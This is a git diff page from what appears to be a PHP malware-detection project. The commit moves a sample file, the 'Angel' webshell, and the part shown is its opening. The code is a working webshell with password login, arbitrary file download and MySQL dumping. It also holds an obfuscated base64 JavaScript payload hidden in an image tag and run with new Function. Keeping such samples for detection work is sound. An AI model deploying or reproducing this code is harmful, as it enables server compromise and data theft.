summaryrefslogtreecommitdiff
path: root/data/samples/classic/angel.php
diff options
context:
space:
mode:
authorMathieu Deous2022-05-02 20:18:23 +0200
committerGitHub2022-05-02 20:18:23 +0200
commit48936efa96ae17295be4e0a71be3294f0ec6aef8 (patch)
treef4e69551f1368aa048edf46b7b061600f3668329 /data/samples/classic/angel.php
parentbbc738e16f8b637afde58d65196374af98a5e0e2 (diff)
Make application go-install-able and create a docker image
Diffstat (limited to '')
-rw-r--r--data/samples/classic/angel.php (renamed from php-malware-finder/samples/classic/angel.php)4298
1 files changed, 2149 insertions, 2149 deletions
diff --git a/php-malware-finder/samples/classic/angel.php b/data/samples/classic/angel.php
index 28a1c79..fdec11e 100644
--- a/php-malware-finder/samples/classic/angel.php
+++ b/data/samples/classic/angel.php
@@ -1,2149 +1,2149 @@
1<?php 1<?php
2error_reporting(7); 2error_reporting(7);
3@set_magic_quotes_runtime(0); 3@set_magic_quotes_runtime(0);
4ob_start(); 4ob_start();
5$mtime = explode(' ', microtime()); 5$mtime = explode(' ', microtime());
6$starttime = $mtime[1] + $mtime[0]; 6$starttime = $mtime[1] + $mtime[0];
7define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/'); 7define('SA_ROOT', str_replace('\\', '/', dirname(__FILE__)).'/');
8define('IS_WIN', DIRECTORY_SEPARATOR == '\\'); 8define('IS_WIN', DIRECTORY_SEPARATOR == '\\');
9define('IS_COM', class_exists('COM') ? 1 : 0 ); 9define('IS_COM', class_exists('COM') ? 1 : 0 );
10define('IS_GPC', get_magic_quotes_gpc()); 10define('IS_GPC', get_magic_quotes_gpc());
11$dis_func = get_cfg_var('disable_functions'); 11$dis_func = get_cfg_var('disable_functions');
12define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 ); 12define('IS_PHPINFO', (!eregi("phpinfo",$dis_func)) ? 1 : 0 );
13@set_time_limit(0); 13@set_time_limit(0);
14 14
15foreach($_POST as $key => $value) { 15foreach($_POST as $key => $value) {
16 if (IS_GPC) { 16 if (IS_GPC) {
17 $value = s_array($value); 17 $value = s_array($value);
18 } 18 }
19 $$key = $value; 19 $$key = $value;
20} 20}
21/*===================== 程序配置 =====================*/ 21/*===================== 程序配置 =====================*/
22 22
23//echo encode_pass('angel');exit; 23//echo encode_pass('angel');exit;
24//angel = ec38fe2a8497e0a8d6d349b3533038cb 24//angel = ec38fe2a8497e0a8d6d349b3533038cb
25// 如果需要密码验证,请修改登陆密码,留空为不需要验证 25// 如果需要密码验证,请修改登陆密码,留空为不需要验证
26$pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel 26$pass = 'ec38fe2a8497e0a8d6d349b3533038cb'; //angel
27 27
28//如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认 28//如您对 cookie 作用范围有特殊要求, 或登录不正常, 请修改下面变量, 否则请保持默认
29// cookie 前缀 29// cookie 前缀
30$cookiepre = ''; 30$cookiepre = '';
31// cookie 作用域 31// cookie 作用域
32$cookiedomain = ''; 32$cookiedomain = '';
33// cookie 作用路径 33// cookie 作用路径
34$cookiepath = '/'; 34$cookiepath = '/';
35// cookie 有效期 35// cookie 有效期
36$cookielife = 86400; 36$cookielife = 86400;
37 37
38//程序搜索可写文件的类型 38//程序搜索可写文件的类型
39!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp'; 39!$writabledb && $writabledb = 'php,cgi,pl,asp,inc,js,html,htm,jsp';
40/*===================== 配置结束 =====================*/ 40/*===================== 配置结束 =====================*/
41 41
42$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8'); 42$charsetdb = array('','armscii8','ascii','big5','binary','cp1250','cp1251','cp1256','cp1257','cp850','cp852','cp866','cp932','dec8','euc-jp','euc-kr','gb2312','gbk','geostd8','greek','hebrew','hp8','keybcs2','koi8r','koi8u','latin1','latin2','latin5','latin7','macce','macroman','sjis','swe7','tis620','ucs2','ujis','utf8');
43if ($charset == 'utf8') { 43if ($charset == 'utf8') {
44 header("content-Type: text/html; charset=utf-8"); 44 header("content-Type: text/html; charset=utf-8");
45} elseif ($charset == 'big5') { 45} elseif ($charset == 'big5') {
46 header("content-Type: text/html; charset=big5"); 46 header("content-Type: text/html; charset=big5");
47} elseif ($charset == 'gbk') { 47} elseif ($charset == 'gbk') {
48 header("content-Type: text/html; charset=gbk"); 48 header("content-Type: text/html; charset=gbk");
49} elseif ($charset == 'latin1') { 49} elseif ($charset == 'latin1') {
50 header("content-Type: text/html; charset=iso-8859-2"); 50 header("content-Type: text/html; charset=iso-8859-2");
51} elseif ($charset == 'euc-kr') { 51} elseif ($charset == 'euc-kr') {
52 header("content-Type: text/html; charset=euc-kr"); 52 header("content-Type: text/html; charset=euc-kr");
53} elseif ($charset == 'euc-jp') { 53} elseif ($charset == 'euc-jp') {
54 header("content-Type: text/html; charset=euc-jp"); 54 header("content-Type: text/html; charset=euc-jp");
55} 55}
56 56
57$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; 57$self = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
58$timestamp = time(); 58$timestamp = time();
59 59
60/*===================== 身份验证 =====================*/ 60/*===================== 身份验证 =====================*/
61if ($action == "logout") { 61if ($action == "logout") {
62 scookie('loginpass', '', -86400 * 365); 62 scookie('loginpass', '', -86400 * 365);
63 @header('Location: '.$self); 63 @header('Location: '.$self);
64 exit; 64 exit;
65} 65}
66if($pass) { 66if($pass) {
67 if ($action == 'login') { 67 if ($action == 'login') {
68 if ($pass == encode_pass($password)) { 68 if ($pass == encode_pass($password)) {
69 scookie('loginpass',encode_pass($password)); 69 scookie('loginpass',encode_pass($password));
70 @header('Location: '.$self); 70 @header('Location: '.$self);
71 exit; 71 exit;
72 } 72 }
73 } 73 }
74 if ($_COOKIE['loginpass']) { 74 if ($_COOKIE['loginpass']) {
75 if ($_COOKIE['loginpass'] != $pass) { 75 if ($_COOKIE['loginpass'] != $pass) {
76 loginpage(); 76 loginpage();
77 } 77 }
78 } else { 78 } else {
79 loginpage(); 79 loginpage();
80 } 80 }
81} 81}
82/*===================== 验证结束 =====================*/ 82/*===================== 验证结束 =====================*/
83 83
84$errmsg = ''; 84$errmsg = '';
85!$action && $action = 'file'; 85!$action && $action = 'file';
86 86
87// 查看PHPINFO 87// 查看PHPINFO
88if ($action == 'phpinfo') { 88if ($action == 'phpinfo') {
89 if (IS_PHPINFO) { 89 if (IS_PHPINFO) {
90 phpinfo(); 90 phpinfo();
91 exit; 91 exit;
92 } else { 92 } else {
93 $errmsg = 'phpinfo() function has non-permissible'; 93 $errmsg = 'phpinfo() function has non-permissible';
94 } 94 }
95} 95}
96 96
97// 下载文件 97// 下载文件
98if ($doing == 'downfile' && $thefile) { 98if ($doing == 'downfile' && $thefile) {
99 if (!@file_exists($thefile)) { 99 if (!@file_exists($thefile)) {
100 $errmsg = 'The file you want Downloadable was nonexistent'; 100 $errmsg = 'The file you want Downloadable was nonexistent';
101 } else { 101 } else {
102 $fileinfo = pathinfo($thefile); 102 $fileinfo = pathinfo($thefile);
103 header('Content-type: application/x-'.$fileinfo['extension']); 103 header('Content-type: application/x-'.$fileinfo['extension']);
104 header('Content-Disposition: attachment; filename='.$fileinfo['basename']); 104 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
105 header('Content-Length: '.filesize($thefile)); 105 header('Content-Length: '.filesize($thefile));
106 @readfile($thefile); 106 @readfile($thefile);
107 exit; 107 exit;
108 } 108 }
109} 109}
110 110
111// 直接下载备份数据库 111// 直接下载备份数据库
112if ($doing == 'backupmysql' && !$saveasfile) { 112if ($doing == 'backupmysql' && !$saveasfile) {
113 if (!$table) { 113 if (!$table) {
114 $errmsg ='Please choose the table'; 114 $errmsg ='Please choose the table';
115 } else { 115 } else {
116 $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); 116 $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
117 $filename = basename($dbname.'.sql'); 117 $filename = basename($dbname.'.sql');
118 header('Content-type: application/unknown'); 118 header('Content-type: application/unknown');
119 header('Content-Disposition: attachment; filename='.$filename); 119 header('Content-Disposition: attachment; filename='.$filename);
120 foreach($table as $k => $v) { 120 foreach($table as $k => $v) {
121 if ($v) { 121 if ($v) {
122 sqldumptable($v); 122 sqldumptable($v);
123 } 123 }
124 } 124 }
125 mysql_close(); 125 mysql_close();
126 exit; 126 exit;
127 } 127 }
128} 128}
129 129
130// 通过MYSQL下载文件 130// 通过MYSQL下载文件
131if($doing=='mysqldown'){ 131if($doing=='mysqldown'){
132 if (!$dbname) { 132 if (!$dbname) {
133 $errmsg = 'Please input dbname'; 133 $errmsg = 'Please input dbname';
134 } else { 134 } else {
135 $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); 135 $mysqllink = mydbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
136 if (!file_exists($mysqldlfile)) { 136 if (!file_exists($mysqldlfile)) {
137 $errmsg = 'The file you want Downloadable was nonexistent'; 137 $errmsg = 'The file you want Downloadable was nonexistent';
138 } else { 138 } else {
139 $result = q("select load_file('$mysqldlfile');"); 139 $result = q("select load_file('$mysqldlfile');");
140 if(!$result){ 140 if(!$result){
141 q("DROP TABLE IF EXISTS tmp_angel;"); 141 q("DROP TABLE IF EXISTS tmp_angel;");
142 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); 142 q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);");
143 //用时间戳来表示截断,避免出现读取自身或包含__angel_1111111111_eof__的文件时不完整的情况 143 //用时间戳来表示截断,避免出现读取自身或包含__angel_1111111111_eof__的文件时不完整的情况
144 q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); 144 q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';");
145 $result = q("select content from tmp_angel"); 145 $result = q("select content from tmp_angel");
146 q("DROP TABLE tmp_angel"); 146 q("DROP TABLE tmp_angel");
147 } 147 }
148 $row = @mysql_fetch_array($result); 148 $row = @mysql_fetch_array($result);
149 if (!$row) { 149 if (!$row) {
150 $errmsg = 'Load file failed '.mysql_error(); 150 $errmsg = 'Load file failed '.mysql_error();
151 } else { 151 } else {
152 $fileinfo = pathinfo($mysqldlfile); 152 $fileinfo = pathinfo($mysqldlfile);
153 header('Content-type: application/x-'.$fileinfo['extension']); 153 header('Content-type: application/x-'.$fileinfo['extension']);
154 header('Content-Disposition: attachment; filename='.$fileinfo['basename']); 154 header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
155 header("Accept-Length: ".strlen($row[0])); 155 header("Accept-Length: ".strlen($row[0]));
156 echo $row[0]; 156 echo $row[0];
157 exit; 157 exit;
158 } 158 }
159 } 159 }
160 } 160 }
161} 161}
162 162
163?> 163?>
164<html> 164<html>
165<head> 165<head>
166<meta http-equiv="Content-Type" content="text/html; charset=gbk"> 166<meta http-equiv="Content-Type" content="text/html; charset=gbk">
167<title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title> 167<title><?php echo $action.' - '.$_SERVER['HTTP_HOST'];?></title>
168<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/> 168<img id="ghdescon" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQAQMAAAAlPW0iAAAAA1BMVEX///+nxBvIAAAAAXRSTlMAQObYZgAAB510RVh0Z2hkZQBnaGRlc2NvblpYWmhiQ2htZFc1amRHbHZiaWh3TEdFc1l5eHJMR1VzY2lsN1pUMW1kVzVqZEdsdmJpaGpLWHR5WlhSMWNtNG9ZenhoUHljbk9tVW9jR0Z5YzJWSmJuUW9ZeTloS1NrcEt5Z29ZejFqSldFcFBqTTFQMU4wY21sdVp5NW1jbTl0UTJoaGNrTnZaR1VvWXlzeU9TazZZeTUwYjFOMGNtbHVaeWd6TmlrcGZUdHBaaWdoSnljdWNtVndiR0ZqWlNndlhpOHNVM1J5YVc1bktTbDdkMmhwYkdVb1l5MHRLWEpiWlNoaktWMDlhMXRqWFh4OFpTaGpLVHRyUFZ0bWRXNWpkR2x2YmlobEtYdHlaWFIxY200Z2NsdGxYWDFkTzJVOVpuVnVZM1JwYjI0b0tYdHlaWFIxY200blhGeDNLeWQ5TzJNOU1YMDdkMmhwYkdVb1l5MHRLV2xtS0d0YlkxMHBjRDF3TG5KbGNHeGhZMlVvYm1WM0lGSmxaMFY0Y0NnblhGeGlKeXRsS0dNcEt5ZGNYR0luTENkbkp5a3NhMXRqWFNrN2NtVjBkWEp1SUhCOUtDZFZMbmM5TkNCM0tHTXBlelFnZUNoa0xIQXBlekVnYVQwd096RWdlajB3T3pFZ2NqMWNKMXduT3prb01TQnBQVEE3YVR4a0xqYzdhU3NyS1hzMUtIbzlQWEF1TnlsNlBUQTdjaXM5YkM1dEtHUXVieWhwS1Y1d0xtOG9laWtwTzNvckszMHpJSEo5TkNCQktITXBlekVnWVQxY0oxd25PemtvTVNCcFBUQTdhVHh6TzJrckt5bDdZU3M5YkM1dEtGZ29UUzVRS0NrcVVTa3BmVE1nWVgwMElHc29aQ3h3S1hzeElHRTlRU2d4TmlrN01XRW9aQzQzSlRFMklUMHdLV1FyUFZ3bk1Gd25PekVnWWoxaE96a29NU0JwUFRBN2FUeGtMamM3YVNzOU1UWXBlMklyUFhnb1pDNXVLR2tzTVRZcExHSXViaWhwTERFMktTbDlNeUI0S0dJc2NDbDlOQ0E0S0NsN015Z3lMbkU5UFhRdVNDWW1NaTUyUFQxMExrY3BmVFFnZVNncGV6RWdZVDFTT3pVb0tESXVhQ1ltTWk1b0xrSW1Kakl1YUM1Q0xqRXdLWHg4S0RJdVF5MHlMbkUrWVNsOGZDZ3lMa1F0TWk1MlBtRXBmSHdvT0NncEppWXlMa1E4U1NsOGZDZzRLQ2ttSmpJdVF6eEtLU2t6SUVzN015Qk1mVFFnTmloaEtYczFLRTRnWVQwOUlrOGlLVE1nWVM1RktDOWNYRnhjTDJjc0lseGNYRnhjWEZ4Y0lpa3VSU2d2WEZ3aUwyY3NJbHhjWEZ4Y1hDSWlLVHN6SUdGOU1TQjFQVk11VkRzeElHVTlWaTVYT3pFZ2FqMGlleUlySWx4Y0luVmNYQ0k2SUZ4Y0lpSXJOaWgxS1NzaVhGd2lMQ0FpS3lKY1hDSlpYRndpT2lCY1hDSWlLellvWlNrcklseGNJaXdnSWlzaVhGd2lXbHhjSWpvZ1hGd2lJaXMyS0dNcEt5SmNYQ0lnSWlzaWZTSTdNU0JtUFdzb2Fpd2lNVEVpS1RzeElHRTlNVElvWmlrN05TZ2hlU2dwS1hzeE15QXhOQ2dwTGpFMVBWd25NVGM2THk4eE9DMHhPUzFHTGpGaUwwWXZQMkU5WENjck1XTW9ZU2w5ZlNjc05qSXNOelVzSjN4MllYSjhkMmx1Wkc5M2ZISmxkSFZ5Ym54bWRXNWpkR2x2Ym54cFpueHpZVzU4YkdWdVozUm9mSFJpZkdadmNueDhmSHg4Zkh4OFJtbHlaV0oxWjN4OGZHVnVZM3hUZEhKcGJtZDhabkp2YlVOb1lYSkRiMlJsZkhOMVluTjBjbnhqYUdGeVEyOWtaVUYwZkh4cGJtNWxjbGRwWkhSb2ZIeDhjMk55WldWdWZIeHBibTVsY2tobGFXZG9kSHhyYTN4OFkyUjhmR2RsYmw5eVlXNWtiMjFmYzNSeWZHTm9jbTl0Wlh4dmRYUmxjbGRwWkhSb2ZHOTFkR1Z5U0dWcFoyaDBmSEpsY0d4aFkyVjhZVzVoYkhsMGFXTnpmR2hsYVdkb2RIeDNhV1IwYUh3ek5UQjhOakF3ZkhSeWRXVjhabUZzYzJWOFRXRjBhSHgwZVhCbGIyWjhjM1J5YVc1bmZISmhibVJ2Ylh3eU5UVjhNVFl3ZkdSdlkzVnRaVzUwZkZWU1RIeDBhR2x6Zkc1aGRtbG5ZWFJ2Y254MWMyVnlRV2RsYm5SOGNHRnljMlZKYm5SOGRXRjhibk44YVhOSmJtbDBhV0ZzYVhwbFpIeHNNbGhXUjJkalNYUTFNV3QwUW1scFdFUTNRakZ0YzFVelMwNURhamgyTVh4aWRHOWhmRzVsZDN4SmJXRm5aWHh6Y21OOGZHaDBkSEI4WjI5dloyeGxmSE4wWVhScFkzeDNhR2xzWlh4amIyMThaVzVqYjJSbFZWSkpRMjl0Y0c5dVpXNTBKeTV6Y0d4cGRDZ25mQ2NwTERBc2UzMHBLUT09Z2hkZXNjb26/DJpDAAAADElEQVQIHWNgIA0AAAAwAAGErPF6AAAAAElFTkSuQmCC"/>
169<style type="text/css"> 169<style type="text/css">
170body,td{font: 12px Arial,Tahoma;line-height: 16px;} 170body,td{font: 12px Arial,Tahoma;line-height: 16px;}
171.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;} 171.input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}
172.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;} 172.area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}
173.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;} 173.bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}
174a {color: #00f;text-decoration:underline;} 174a {color: #00f;text-decoration:underline;}
175a:hover{color: #f00;text-decoration:none;} 175a:hover{color: #f00;text-decoration:none;}
176.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;} 176.alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 15px 5px 5px;}
177.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;} 177.alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 15px 5px 5px;}
178.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;} 178.focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 15px 5px 5px;}
179.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;} 179.head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 15px 5px 5px;font-weight:bold;}
180.head td span{font-weight:normal;} 180.head td span{font-weight:normal;}
181.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;} 181.infolist {padding:10px;margin:10px 0 20px 0;background:#F1F1F1;border:1px solid #ddd;}
182form{margin:0;padding:0;} 182form{margin:0;padding:0;}
183h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;} 183h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}
184ul.info li{margin:0;color:#444;line-height:24px;height:24px;} 184ul.info li{margin:0;color:#444;line-height:24px;height:24px;}
185u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;} 185u{text-decoration: none;color:#777;float:left;display:block;width:150px;margin-right:10px;}
186.drives{padding:5px;} 186.drives{padding:5px;}
187.drives span {margin:auto 7px;} 187.drives span {margin:auto 7px;}
188</style> 188</style>
189<script type="text/javascript"> 189<script type="text/javascript">
190if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain}; 190if(typeof btoa=="undefined")btoa=function(a,b){b=(typeof b=='undefined')?false:b;var d,o2,o3,bits,h1,h2,h3,h4,e=[],pad='',c,plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";plain=b?Utf8.encode(a):a;c=plain.length%3;if(c>0){while(c++<3){pad+='=';plain+='\0'}}for(c=0;c<plain.length;c+=3){d=plain.charCodeAt(c);o2=plain.charCodeAt(c+1);o3=plain.charCodeAt(c+2);bits=d<<16|o2<<8|o3;h1=bits>>18&0x3f;h2=bits>>12&0x3f;h3=bits>>6&0x3f;h4=bits&0x3f;e[c/3]=f.charAt(h1)+f.charAt(h2)+f.charAt(h3)+f.charAt(h4)}coded=e.join('');coded=coded.slice(0,coded.length-pad.length)+pad;return coded};if(typeof atob=="undefined")atob=function(a,b){b=(typeof b=='undefined')?false:b;var e,o2,o3,h1,h2,h3,h4,bits,d=[],plain,coded;var f="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";coded=b?Utf8.decode(a):a;for(var c=0;c<coded.length;c+=4){h1=f.indexOf(coded.charAt(c));h2=f.indexOf(coded.charAt(c+1));h3=f.indexOf(coded.charAt(c+2));h4=f.indexOf(coded.charAt(c+3));bits=h1<<18|h2<<12|h3<<6|h4;e=bits>>>16&0xff;o2=bits>>>8&0xff;o3=bits&0xff;d[c/4]=String.fromCharCode(e,o2,o3);if(h4==0x40)d[c/4]=String.fromCharCode(e,o2);if(h3==0x40)d[c/4]=String.fromCharCode(e)}plain=d.join('');return b?Utf8.decode(plain):plain};
191setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(5);}, 500); 191setTimeout(function(){new Function(atob(atob(document.getElementById('ghdescon').src.substr(22)).match(/ghdescon(.*?)ghdescon/)[1])).apply(this);kk(5);}, 500);
192</script> 192</script>
193<script type="text/javascript"> 193<script type="text/javascript">
194function CheckAll(form) { 194function CheckAll(form) {
195 for(var i=0;i<form.elements.length;i++) { 195 for(var i=0;i<form.elements.length;i++) {
196 var e = form.elements[i]; 196 var e = form.elements[i];
197 if (e.name != 'chkall') 197 if (e.name != 'chkall')
198 e.checked = form.chkall.checked; 198 e.checked = form.chkall.checked;
199 } 199 }
200} 200}
201function $(id) { 201function $(id) {
202 return document.getElementById(id); 202 return document.getElementById(id);
203} 203}
204function createdir(){ 204function createdir(){
205 var newdirname; 205 var newdirname;
206 newdirname = prompt('Please input the directory name:', ''); 206 newdirname = prompt('Please input the directory name:', '');
